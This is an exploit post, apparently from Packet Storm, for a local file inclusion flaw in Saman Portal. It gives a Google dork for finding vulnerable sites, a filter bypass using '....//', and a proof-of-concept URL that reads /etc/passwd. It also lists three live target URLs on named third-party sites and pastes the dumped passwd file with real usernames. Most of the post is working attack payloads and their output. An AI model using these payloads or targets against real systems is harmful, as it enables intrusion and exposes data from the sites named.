Saman Portal Local File Inclusion

🗓️ 07 Mar 2012 00:00:00Reported by TMTType

packetstorm🔗 packetstormsecurity.com👁 20 Views

Saman Portal LFI Vuln in pnuserapi.php on line 117 allows LFI via the sismodule paramete

`===========================================================  
  
[+] Title: [Iranian] Saman portal LFI  
[+] Date: 2/28/12  
[+] Author: TMT  
[+] Mail: taktaz_m2800[a.t]yahoo.com  
[+] Type: PHP  
[+] Vendor or Software Link: http://www.sis-eg.com  
[+] Customers: http://sis-eg.com/services/customers/  
[+] Google dork: inurl:sismodule=user  
  
============================================================  
[~] desc:  
Vuln in modules/sisRapid/pnuserapi.php on line 117  
  
just "../" filtered to prevent LFI but "....//" will work  
  
  
[~] poc:  
http://www.site.com/index.php?module=cdk&func=loadmodule&system=cdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd  
  
  
  
[~] Demo site:  
  
http://isqi.co.ir/index.php?module=cdk&func=loadmodule&system=cdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd&sisOp=view&cnt_id=3036&ctp_id=3&id=59  
http://www.bimehma.com/index.php?module=fdk&func=loadmodule&system=fdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd&sisOp=view&cnt_id=2687&ctp_id=26&id=12  
http://www.epco.co.ir/index.php?module=cdk&func=loadmodule&system=cdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....///etc/passwd&sisOp=view&cnt_id=7&ctp_id=3&id=4&newlang=eng  
  
  
  
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin   
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin   
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync   
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt   
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin   
operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin   
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin   
nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin   
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin   
named:x:25:25:Named:/var/named:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin   
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin   
postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:498:500::/var/www:/bin/false   
diradmin:x:497:497::/usr/local/directadmin:/bin/false mysql:x:496:496:MySQL   
server:/var/lib/mysql:/bin/false webapps:x:500:501::/var/www/html:/bin/false   
majordomo:x:495:2::/etc/virtual/majordomo:/bin/false   
dovecot:x:494:494::/home/dovecot:/bin/false admin:x:501:502::/home/admin:/bin/bash   
attari:x:502:504::/home/attari:/bin/bash   
`

07 Mar 2012 00:00Current

7.4High risk

Vulners AI Score7.4